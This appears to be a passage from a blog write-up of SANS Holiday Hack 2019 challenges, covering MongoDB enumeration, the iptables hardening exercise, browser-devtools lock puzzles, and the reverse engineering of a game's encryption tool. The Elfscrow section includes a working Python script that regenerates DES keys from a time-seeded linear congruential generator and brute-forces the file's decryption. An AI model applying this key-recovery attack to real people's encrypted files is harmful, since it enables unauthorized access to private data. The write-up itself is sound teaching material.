2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is 'always'.
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] **        We suggest setting it to 'never'
2020-01-22T00:45:29.764+0000 I CONTROL  [initandlisten] 
>

And we’re in, perfect! Let’s list all the databases now to see if we can find the teachers database.

> show dbs
admin   0.000GB
config  0.000GB
elfu    0.000GB
local   0.000GB
test    0.000GB

The elfu database seems promising, so let’s select that one for use, and then list all the collection (tables) that are stored within that database.

> use elfu
switched to db elfu
> show collections
bait
chum
line
metadata
solution
system.js
tackle
tincan

Right away we spot the solution table, so all we have to do is read that table and list all the contents. We can use mongo’s db.collection.find() command for this.

What this command does is it selects documents in a collection or view and returns a cursor to the selected documents, which is simply a pointer to the result set of a query.

> db.solution.find()
{ "_id" : "You did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **" }

Nice, so we seem to have found the solution! All we need to do is execute the command provided to us.

> db.loadServerScripts();displaySolution();
  
          .
       __/ __
            /
       /.'o'. 
        .o.'.
       .'.'o'.
      o'.o.'.*.
     .'.o.'.'.*.
    .o.'.o.'.o.'.
       [_____]
        ___/


  Congratulations!!

And there we have it, we completed the terminal challenge! Easy!

Recover Cleartext Document

Upon successfully completing the Mongo Pilfer CranPi we can talk to Holly again for more hints that will allow us to complete the next objective.

For this objective, we need to recover the plaintext content from this encrypted document. All we know is that it was encrypted on December 6, 2019, between 7pm and 9pm UTC.

Upon looking into the objective we learn that the Elfscrow Crypto tool is a vital asset used at Elf University for encrypting SUPER SECRET documents. Unfortunately we can’t get the source, but we do get some debug symbols that we can use.

Before we continue on with this challenge, I highly recommend you go and watch the Reversing Crypto the Easy Way KringleCon talk that was provided to us as a hint by Holly, as it will better help us understand what we need to do.

Since this is a Reverse Engineering challenge, I’ll try to do my best on explaining how I completed the challenge. For me. solving this challenge involved utilizing both IDA and Immunity Debugger to better understand what is really going on under the hood of this encryption tool.

Overall, I might have complicated the process, but after doing my OSCE, I really liked making sure I fully understood how something works before I wrote an exploit or tool. So with that out of the way, let’s jump into it!

For starters, once you download the elfscrow.exe tool, we should play around with it to figure out how it work, what options we can use, and all that. If you downloaded this tool on Kali, then you can use wine to run the windows exe.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe 
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

* WARNING: You're reading from stdin. That only partially works, use at your own risk!

** Please pick --encrypt or --decrypt!

Are you encrypting a file? Try --encrypt! For example:

  Z:\root\HH\elfscrow_crypto\elfscrow.exe --encrypt <infile> <outfile>

You'll be given a secret ID. Keep it safe! The only way to get the file
back is to use that secret ID to decrypt it, like this:

  Z:\root\HH\elfscrow_crypto\elfscrow.exe --decrypt --id=<secret_id> <infile> <outfile>

You can optionally pass --insecure to use unencrypted HTTP. But if you
do that, you'll be vulnerable to packet sniffers such as Wireshark that
could potentially snoop on your traffic to figure out what's going on!

From the start we can see that there are three options provided by this tool, --encrypt and --decrypt are self-explanatory, and then we also have --insecure which seems to use HTTP instead of HTTPS.

Okay, so let’s see what kind of traffic this tool generates. Let’s start up wireshark, and attempt to decrypt the encrypted ElfU research PDF, while also passing the insecure parameter.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --decrypt --id="test" ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc decrypted.pdf
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

Let's see if we can find your key...

Retrieving the key from: /api/retrieve

Uh oh, an error happened! Please don't tell Santa :(

HTTP 400: Bad identifier - must be a UUID

We can see that we need a valid UUID to be passed inside the id parameter to retrieve the key. Well, let’s take a look at the network traffic generated by this.

The network traffic doesn’t really reveal much to us, except the fact that it’s reaching out to some sort of API endpoints (in this case /api/retrieve) to retrieve the decryption key from a provided UUID.

Okay, well since we need a UUID, let’s go ahead and encrypt a test file to see what kind of data/keys are generated for us.

root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --encrypt test.txt test.txt.enc --insecure
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

*** WARNING: This traffic is using insecure HTTP and can be logged with tools such as Wireshark

Our miniature elves are putting together random bits for your secret key!

Seed = 1578005170

Generated an encryption key: 8879363da3759d36 (length: 8)

Elfscrowing your key...

Elfscrowing the key to: elfscrow.elfu.org/api/store

Your secret id is 04b57639-e474-4276-8294-4aa9e0d6427f - Santa Says, don't share that key with anybody!
File successfully encrypted!

    ++=====================++
    ||                     ||
    ||      ELF-SCROW      ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||     O               ||
    ||     |               ||
    ||     |   (O)-        ||
    ||     |               ||
    ||     |               ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||                     ||
    ||                     ||
    ++=====================++

Okay, this has a lot of information we can use! We can see three very important items presented to us by this tool. First of all, we get the UUID that we need to retrieve the keys from the server, second of all we get our encryption key that is 8 bytes in length, and finally we also see a seed!

Usually this data shouldn’t be presented to the end user, reason why is because by having the key and seed we can try and to figure out how the encryption works. That way, we can then write our own key generation tool that can be used to crack or decrypt files.

But hold on, that seed looks very odd. If we remember correctly, the objective states that the document was encrypted on December 6, 2019, between 7pm and 9pm UTC. What’s the chance that this seed is simply the current time in linux?

If we attempt to convert the seed to human readable time, we do in fact see that the seed is the current system time! Perfect, so we solved one piece of the puzzle!

Usually having something like this as a seed generator isn’t really secure, as it’s easily enumerable and guessable and can lead to someone cracking your encryption if it’s not implemented properly.

Okay, so with the information we gathered here, let’s move over to a Windows VM and open the elfscrow encryption tool binary in IDA so we can utilize the debug symbols that came with it. This way we will be able to see the proper function names and variables used in the tool.

Once on windows, after you open the elfscrow tool in IDA for disassembly, we can import the debug symbols by going to File -> Load file -> PDB file… which will open a new window.

In that new window, locate the elfscrow.pdb file that we downloaded, select it, and press OK.

If that loads successfully, then we should be able to see all function names used in the binary, instead of random junk like func_0123456.

Alright, so this is where stuff gets a little tricky since we will be diving directly into IDA. Using IDA should be pretty self-explanatory and I’ll try to explain as best as I can, but if you’d like - you can read the Reverse Engineering with Ida Pro slides by Chris Eagle to get a better idea of how to use it.

You can also read my Google CTF (2018): Beginners Quest - Reverse Engineering Solutions blog post as I go over how to use IDA for cross referencing functions and string, finding strings, etc.

Upon looking into the function names in the Functions window on the left-hand side, we notice one very interesting function called generate_key. So let’s double click that, which should bring us the disassembly window for that function definition.

Closely inspecting this, we can see that the time function is being called, and is being passed as a parameter into the super_secure_srand function. This function simply just prints the epoch time to the screen, and is setting that time as our seed for further use.

After that β€œsecure random number” is generated, if we look a little further down the application flow path, we will see the following.

In loc_401E31 we see that the program is setting up a loop, as determined by the cmp or compare instruction. Notice that it is comparing the value in [ebp+var_4] to the value 8. If the compared value is equal to 8, we jmp or jump to loc_401E4F and call the generate_key function, otherwise we continue with the application flow to the left.

In the continued application flow within the loop we call the super_secure_random function. So that’s pretty interesting to us as it’s different from the β€œsecure random” one we just saw.

So, if we double click on that function, we should be able to see the disassembly for it.

Note that I converted some of those values within that function from hex to decimal to better see what values are being passed into the registers.

From the top, we can see that the super_secure_random function is using the mov or move instruction to move the value of state into the eax register. In this case the state parameter would be our seed generated by the super_secure_srand function.

Next, it’s taking the state parameter and it’s performing an imul against it, which simply performs a signed multiplication of two operands. In this case, state is multiplied by 214013 and the return value is passed into the eax register.

Next, the binary performs a simple add instruction by adding 2531011 into the eax register. It’s then taking the value stored in eax and putting it back into our state variable, which will be used for out second loop, hence the cmp instruction in loc_401E31 as we spoke about previously.

Next, the last few instructions in the function take the value in eax which is our currently modified seed, and perform an and operation or a bitwise AND operation against it with the value of 0x7FFFFFFF.

Once that’s done, the sar operation is carried out against the value in eax which shifts the bits of the destination operand to the right by 16.

Finally, if we look back to the program flow, we will see that the movezx ecx, al instruction is carried out, which gets the LSB or least significant bit of the hex value from eax, moves it to ecx and then carries out another bitwise AND operation against ecx by using the value of 0xFF.

Once that’s completed this function loops around 8 times, and reuses the modified state parameter after the multiplication and addition manipulations were done to it.

Overall, seeing the application take the LSB of the eax parameter tells me that this might be 1 byte of the 8-byte generated key.

Alright, so we know what the application is doing, but first we need to figure out what kind of encryption this is, or what kind of generator we are using.

If we google the imul value of 214013 we will learn that this is a linear congruential generator, which is simply is an algorithm that yields a sequence of pseudo-randomized numbers calculated with a discontinuous piecewise linear equation.

And if we follow the Wikipedia link, and look at the common parameter use, we will see that that value is used for Microsoft!

To validate this even further, in IDA if we press Shift+F12 and look though the strings, we validate that the Microsoft Enhanced Cryptographic Provider is being utilized!

Also, thankfully Microsoft provides us a table which highlights the difference between what kind of encryption algorithms this encryption provider can use.

If you look closely, we can see that DES or the Data Encryption Standard which is a symmetric-key algorithm, uses a base provider key length of 56 bits, which is 7 bytes long! This is exactly the same length as our key (remember, we start a key array at 0, so 7 bytes is a total length of 0 to 7 or 8 in total if we include 0)!

Okay awesome, so we know how the application generates its seed, it’s keys and what encryption it uses. Now the question is, how can we write an exploit or tool to decrypt the document using this?

Well if we return to our previous google search and follow the first link from Rosetta Code, we will see that they provide code examples for creating linear congruential generators in any language!

If we scroll down, we will find an example in python!

Awesome! We actually have a code example that we can use to generate our keys!

So using what we learned from reverse engineering the application, and this code example, let’s write a simple proof of concept to generate a new key!

Since we encrypted a test file previously, let’s use the seed and key that was generated for us by the elfscrow tool. We do this so we can compare our output and make sure that it in fact is generating the correct key.

Once that’s done, our python code will look like so:

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key


seed = 1578008540
key = generate_key(seed)
print("Expected Key: 852b4834572d1d62")
print("Generated Key: " + key)

Once the script is completed, let’s execute it and see what we get!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py
Expected Key: 852b4834572d1d62
Generated Key: 852b4834572d1d62

Awesome, we have a working key generator that generates a valid key from our seed!

Now before we continue, some of you might be asking my what that lsb.zfill(2) line does.

Well, simply zfill pads string on the left with zeros. This is done because during some of my reverse engineering efforts I noticed that when my script returned a least significant bit that contained a 0, such as 0x0F it would strip the 0 and only pass F into the key.

So I implemented a little check. Simply I check to see if my LSB is less than 2 bytes. If it is, I know that there was a 0 stripped from it, and we use zfill to add it back.

Cool, so we have the key generator working! Now all that’s left to do is to figure out the decryption. We already know that this is DES, but we need to figure out what kind of padding is used.

If we look back into the function names, we will see a function called do_decrypt. If we double click that function and follow the graph (application flow) we will spot that the application utilizes DES-CBC as per the CryptImportKey function.

Now all that’s left is to implement the decryption function in python. This is easily implemented by using pythons Single DES package.

from Crypto.Cipher import DES
def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	infile = open(in_file, 'rb')
	data = infile.read()
	outfile = open(out_file, 'wb')
	print("Decrypting File...")
	outfile.write(cipher.decrypt(data))
	print("File Saved As: " + out_file)

Alright, now that we have that, we need to test this. So let’s start by creating a test file and encrypting it.

root@kali:~/HH/elfscrow_crypto# cat test.txt 
This is a test!
root@kali:~/HH/elfscrow_crypto# wine elfscrow.exe --encrypt test.txt test.txt.enc
Welcome to ElfScrow V1.01, the only encryption trusted by Santa!

Our miniature elves are putting together random bits for your secret key!

Seed = 1578097585

Generated an encryption key: 6532547fb69b4569 (length: 8)

Elfscrowing your key...

Elfscrowing the key to: elfscrow.elfu.org/api/store

Your secret id is c2720899-057f-425a-bd25-2232c9e4f923 - Santa Says, don't share that key with anybody!
File successfully encrypted!

Okay so we encrypted a document called test.txt. We also have our seed and expected key. Let’s go ahead and update our python script to use these values, and automatically decrypt our encrypted document, which we saved as test.txt.enc.

Out updated python script will look something like this:

from Crypto.Cipher import DES

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key

def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	infile = open(in_file, 'rb')
	data = infile.read()
	outfile = open(out_file, 'wb')
	print("Decrypting File...")
	outfile.write(cipher.decrypt(data))
	print("File Saved As: " + out_file)


print("DES CBC Elfscrow Decryptor")
print("===========================")
infile = input("Enter Encrypted File Name: ")
outfile = input("Enter Decrypted File Name: ")
seed = input("Enter Seed: ")
key = generate_key(seed)
print("Expexted Key: ce0b990b93d431a6")
print("Generated Key: " + key)
decrypt(key, infile, outfile)

Alright, once updated let’s see if this works! If all goes well, whatever we save the decrypted file to should read β€œThis is a test!”. Let’s give it a shot!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py 
DES CBC Elfscrow Decryptor
===========================
Enter Encrypted File Name: test.txt.enc 
Enter Decrypted File Name: test_decode.txt
Enter Seed: 1578097585
Expexted Key: 6532547fb69b4569
Generated Key: 6532547fb69b4569
Decrypting File...
File Saved As: test_decode.txt
root@kali:~/HH/elfscrow_crypto# cat test_decode.txt 
This is a test!

It works! Yes! All that’s left for us to do is to attempt decrypting the PDF document. We know that the document was encrypted on December 6, 2019, between 7pm and 9pm UTC. Knowing that, let’s generate the linux time between those time frames so we can use them in our seed.

Alright, we need to generate keys by using a see from 1575658800 to 1575666000. It should be pretty simple!

Just one problem! How will we know if the PDF decrypts successfully? If we try to decrypt the data with a bad key, all we will get is junk.

Don’t fear, I already thought of that! 😊

We can use a python package called filetype which will be used to infer the file type and MIME type by checking the magic numbers signature of a file or buffer. After each decryption, we will save the file and check the magic bytes.

If the magic bytes are that of a PDF type, then we know the decryption was successful and we can stop the decryption process.

With that, let’s update our python script for the final run! The script should look like so:

from Crypto.Cipher import DES
import filetype
import sys

def generate_key(seed):
	x = 0
	key = ""
	org_seed = seed
	while (x < 8):
		org_seed = (214013*seed + 2531011)
		seed = (214013*seed + 2531011) & 0x7fffffff
		seed = seed >> 16
		lsb = hex(seed & 0xFF)[2:]
		if (len(lsb) < 2):
			lsb = lsb.zfill(2)
		key += lsb
		seed = org_seed
		x += 1
	return key

def decrypt(key, in_file, out_file):
	cipher = DES.new(bytes.fromhex(key), DES.MODE_CBC, b'\0'*8)
	infile = open(in_file, 'rb')
	data = infile.read()
	outfile = open(out_file, 'wb')
	print("[-] Decrypting File with Key: " + key)
	outfile.write(cipher.decrypt(data))
	kind = filetype.guess(out_file)
	if (kind is None):
		print("[X] Decryption Failed!")
		return
	elif (kind.mime == "application/pdf"):
		print("[!] Decryption Successful!")
		print("File Saved As: " + out_file)
		sys.exit()
	else:
		print("[X] Decryption Failed!")
		return


print("DES CBC Elfscrow Decryptor")
print("===========================")
for x in range(1575658800, 1575666000):
	seed = x
	key = generate_key(seed)
	decrypt(key, "ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc", "DecryptedElfUResearch.pdf")

Alright, the moment for truth! Let’s kick this off and hope that all our hard work payed off!

root@kali:~/HH/elfscrow_crypto# python3 decrypt.py 
DES CBC Elfscrow Decryptor
===========================
[-] Decrypting File with Key: d7c21b323c209f0f
[X] Decryption Failed!
[-] Decrypting File with Key: dabfe3318676c8a0
[X] Decryption Failed!
[-] Decrypting File with Key: b2b1a232c7e9d25b
[X] Decryption Failed!
---snip---
[-] Decrypting File with Key: b5ad6a321240fbec
[!] Decryption Successful!
File Saved As: DecryptedElfUResearch.pdf

After some time, we can see that decryption was successful! Navigating to the DecryptedElfUResearch.pdf document and opening it up, we see that decryption was successful and we can read the document!

Now that we have the decyrpted document, we can read the middle line on the cover page. From here, we can navigate to the tenth objective in our badge and enter β€œMachine Learning Sleigh Route Finder” to complete the objective.

Objective 11

Smart Braces - CranPi

From Holly in the NetWars room, we go back out to the Quad, and go north into the Student Union where we meet Kent Tinseltooth.

Upon talking with Kent, we learn that someone might have hacked Kent’s IoT Smart Braces (really…) and is using that to talk to him.

Well Kent says that he wants us to take a look at the Smart Braces terminal, so let’s help this poor guy out before he loses his mind.

Upon accessing the CranPi terminal, we are presented with the following:

Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I'm talking to you, Kent.
Kent TinselTooth: Who said that? I must be going insane.
Kent TinselTooth: Am I?
Inner Voice: That remains to be seen, Kent. But we are having a conversation.
Inner Voice: This is Santa, Kent, and you've been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you've built an automated, machine-learning, sleigh device.
Kent TinselTooth: How did you know that?
Inner Voice: I'm Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That's right, Kent. Where is the sleigh device now?
Kent TinselTooth: I can't tell you.
Inner Voice: How would you like to intern for the rest of time?
Kent TinselTooth: Please no, they're testing it at srf.elfu.org using default creds, but I don't know more. It's classified.
Inner Voice: Very good Kent, that's all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you've researched and studied. From now on, stop playing with your teeth, and floss more.
*Inner Voice Goes Silent*
Kent TinselTooth: Oh no, I sure hope that voice was Santa's.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and help me configure the firewall.
Kent TinselTooth: Please hurry; having this ribbon cable on my teeth is uncomfortable.
elfuuser@d4664263e075:~$ 

Something’s not right, the β€œinner voice” must be the hacker… and it’s definitely not Santa! Kent said that we need to help configure the firewall on the braces. He also provided us a file to review for the firewall configuration which is located in /home/elfuuser/IOTteethBraces.md.

So let’s see what that contains.

elfuuser@d4664263e075:~$ ls
IOTteethBraces.md
elfuuser@d4664263e075:~$ cat IOTteethBraces.md 
# ElfU Research Labs - Smart Braces
### A Lightweight Linux Device for Teeth Braces
### Imagined and Created by ElfU Student Kent TinselTooth

This device is embedded into one's teeth braces for easy management and monitoring of dental status. It uses FTP and HTTP for management and monitoring purposes but also has SSH for remote access. Please refer to the management documentation for this purpose.

## Proper Firewall configuration:

The firewall used for this system is `iptables`. The following is an example of how to set a default policy with using `iptables`:

___
sudo iptables -P FORWARD DROP
___
The following is an example of allowing traffic from a specific IP and to a specific port:

___
sudo iptables -A INPUT -p tcp --dport 25 -s 172.18.5.4 -j ACCEPT
___

A proper configuration for the Smart Braces should be exactly:

1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).
4. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

After reading the provided document, we learn that we need to configure Iptables rules for the braces. We also learn that there is a proper configuration for the smart braces which contains exactly 6 rules.

Alright, so let’s start with the first rule:

  1. Set the default policies to DROP for the INPUT, FORWARD, and OUTPUT chains.

In iptables, rules are predefined into chains (INPUT, OUTPUT and FORWARD). These chains are checked against any network traffic relevant to those chains and a decision is made about what to do with each packet based upon the outcome of those rules. These actions are referred to as targets, of which the two most common predefined targets are DROP to drop a packet or ACCEPT to accept a packet.

These are 3 predefined chains in the filter table to which we can add rules for processing IP packets passing through those chains. These chains are:

  • INPUT - All packets destined for the host computer.
  • OUTPUT - All packets originating from the host computer.
  • FORWARD - All packets neither destined for nor originating from the host computer, but passing through (routed by) the host computer. This chain is used if you are using your computer as a router.

Knowing this, we now need to set default policies for these chains, and have them DROP all traffic by default if it won’t match a specific rule set that we will give it.

We can do this by passing iptables the -P or --policy option, which will set the policy for the chain to the given target. If you’re confused on all of this then I suggest you read the iptables man page as well as the iptables how-to.

The commands for these settings will look like so.

elfuuser@d4664263e075:~$ sudo iptables -P INPUT DROP
elfuuser@d4664263e075:~$ sudo iptables -P FORWARD DROP
elfuuser@d4664263e075:~$ sudo iptables -P OUTPUT DROP

Once that’s done, we can pass the -L option in iptables to list all the current rules and check if our changes were made.

elfuuser@d4664263e075:~$ sudo iptables -L
Chain INPUT (policy DROP)
target     prot opt source               destination         

Chain FORWARD (policy DROP)
target     prot opt source               destination         

Chain OUTPUT (policy DROP)
target     prot opt source               destination

Great, we now have our default policy set properly. Let’s move onto the next rule.

  1. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.

For this rule set we are configuring something called the state. The state module is able to examine the state of a packet and determine if it is NEW, ESTABLISHED or RELATED.

  • NEW - Refers to incoming packets that are new incoming connections that weren’t initiated by the host system.
  • ESTABLISHED and RELATED - Refers to incoming packets that are part of an already established connection or related to an already established connection by the user. Such as opening a web browser and going to Google.

Specifically, for this we have to configure these state modules to ALLOW traffic. We can specify a module in iptables with the -m option, followed by the module name. In this case we will be using the conntrack module, which is short for connection tracking.

With this module we can pass the --ctstate option followed by the comma separated connection states we want to modify. And finally we will pass the -j option followed by the target rule (accept or drop).

The commands for this should look like so:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
elfuuser@d4664263e075:~$ sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT

Once again, we can pass the -L option in iptables to list all the current rules and check if our changes were made.

elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Good job! We can now move onto the third rule.

  1. Create a rule to ACCEPT only remote source IP address 172.19.0.225 to access the local SSH server (on port 22).

For this one, we need to create a new INPUT rule that will accept NEW connections from the IP of 172.19.0.225 and allow it to access the SSH server on port 22, all other connections need to be dropped.

In iptables, to specify an ip source, we can pass the -s option followed by the IP. For destination ports, we can pass the --dport option followed by the port.

Knowing this, we can go ahead and create a rule that should look like the following:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp -s 172.19.0.225 --dport 22 -m conntrack --ctstate NEW -j ACCEPT

Once done, let’s check if it’s correct.

elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

Nice, we got the proper rule in! Next one!

  1. Create a rule to ACCEPT any source IP to the local TCP services on ports 21 and 80.

For this one, we need to create a rule that will ACCEPT any traffic to the local services on port 21 and 80.

We can pretty much reuse the previous rule and modify it a little bit. The newly created rules should look like the following:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp --dport 21 -m conntrack --ctstate NEW -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -A INPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED

And that one is done! Onto the next one.

  1. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.

For this one, we need to create a rule that will allow all OUTPUT traffic going from the braces out to the internet on port 80.

Simple enough. The command for this one should look like so:

elfuuser@d4664263e075:~$ sudo iptables -A OUTPUT -p tcp --dport 80 -m conntrack --ctstate NEW -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

And there we have it! Onto the final rule!

  1. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.

For this one, we need to create a rule that will ACCEPT all INPUT traffic that is coming from the local interface of the computer. In iptables, we can specify interfaces by passing in the -i option followed by the interface name.

This command is also pretty easy and will look like so:

elfuuser@d4664263e075:~$ sudo iptables -A INPUT -i lo -j ACCEPT  
elfuuser@d4664263e075:~$ sudo iptables -L  
Chain INPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  172.19.0.225  anywhere  tcp dpt:22 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:21 ctstate NEW  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW  
ACCEPT  all  --  anywhere  anywhere

Chain FORWARD (policy DROP)  
target  prot opt source  destination

Chain OUTPUT (policy DROP)  
target  prot opt source  destination  
ACCEPT  all  --  anywhere  anywhere  ctstate RELATED,ESTABLISHED  
ACCEPT  tcp  --  anywhere  anywhere  tcp dpt:80 ctstate NEW

Once that’s completed, just wait a few seconds and the challenge should be completed!

elfuuser@d4664263e075:~$
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!

Open the Sleigh Shop Door

Upon successfully completing the Smart Braces CranPI, we can talk to Kent again for more hints that will allow us to complete the next objective.

For this challenge we need to open the Sleigh Shop door, as well as help Shinny Upatree solve a problem.

If we go to the Sleigh Shop door, we notice a crate and a locked door.

Kent mentioned something about a crate and it having some sort of locks. He mentioned something about using our browser and the Chrome Dev Tools.

Well, let’s see what’s in this create before we start making assumption. Upon clicking the crate, we are taken to a new browser with the following screen.

From the initial start we see that the create contains the villains name inside, possibly the one behind hacking ElfU! There also seems to be some sort of lock on there with a riddle. Something about a console and scroll a little?

Well if we remember correctly, Kent told us that we can probably use our developer console. So, let’s press F12 to open the developer console up, navigate to the Console tab, and scroll up.

Cool we found a code! Entering that code unlock the lock for us.

Scrolling down to the second one and continuing to use our developer console. We can inspect the elements to find our second code.

The third lock mentions something about the code being β€œfetched”. I would assume that that means network. Let’s jump over to our Network tab, and we will see an image with the code needed to unlock the lock.

The forth lock hints us about local variables. These variables are usually stored by JavaScript and contained in something called the localStorage.

Navigating to our Console tab, we can type localStorage and we will see our code!

The fifth lock asks us if we noticed something in the title. So if we use our Elements tab and scroll up to the <head> and <title> element, we will see our code at the end.

The sixth lock tells us that that in order for the hologram to be effective, we need to increase the perspective. In the case of web applications, the perspective is a CSS property determines the distance between the z=0 plane and the user in order to give a 3D-positioned element some perspective.

So, using our Elements tab again, if we click on the hologram class, we will be able to see the CSS information on the right-hand side. Simply, disable perspective, and we should see our code.

The seventh lock mentions something about the slick font that we are seeing. Again I’m assuming this is going to be something in the CSS for the font-family. So using the console, select the instructions class and look for the font. We should find our code there.

The eight lock tells us that in the event that the .eggs go bad, someone will be sad. The event keyword is a big give away here. In web application, an event or eventListener is an interface that represents an object that can handle an event dispatched by an EventTarget object.

We’re assuming that the .eggs has an event tied to it, we can simply find it in our console, and on the left side, click on Event Listeners which will reveal the code!

The ninth lock tells us that the next code will be β€œunderacted” but after all the chakras are active. The big keyword here is active. Simply The :active CSS pseudo-class represents an element (such as a button) that is being activated by the user. When using a mouse, β€œactivation” typically starts when the user presses down the primary mouse button.

If we follow the elements in the console, we will find some classes with the name chakra. We can simply force them to be in an active state by right clicking on them, going to Force state and selecting active.

After all the chakras are active, we will get the code.

The tenth lock tell us that it’s out of commission and that we need to pop off the cover to see what missing. We can simply remove the cover by selecting its element in the console, and pressing delete.

Once the cover is off, we can see that there is a button inside.

Pressing the button does nothing, but if we enter a fake code, and then press the button, it will generate an error for us in the Console tab.

Looking at the error we see that we are missing macaroni at the button element. Macaroni? What the heck does this mean? Well, as confused as we might be, let’s search for that term in the Elements console.

Once we press enter, you will see that we find a new component class called macaroni. Simply select the line, and drag it down below the switch class for the tenth lock.

Redoing the same thing, as we did before, we see that we are missing a cotton swab. So let’s do the same thing as we did before, but this time for the swab.

Repeating the process again, we see that we are missing a gnome.

Once all those pieces are in place, we notice that on the bottom left hand corner of the circuit board, there is the code! Entering that into the lock allows us to complete the challenge!

Upon reading this we know that The Tooth Fairy is the villain behind the hacks in ElfU!

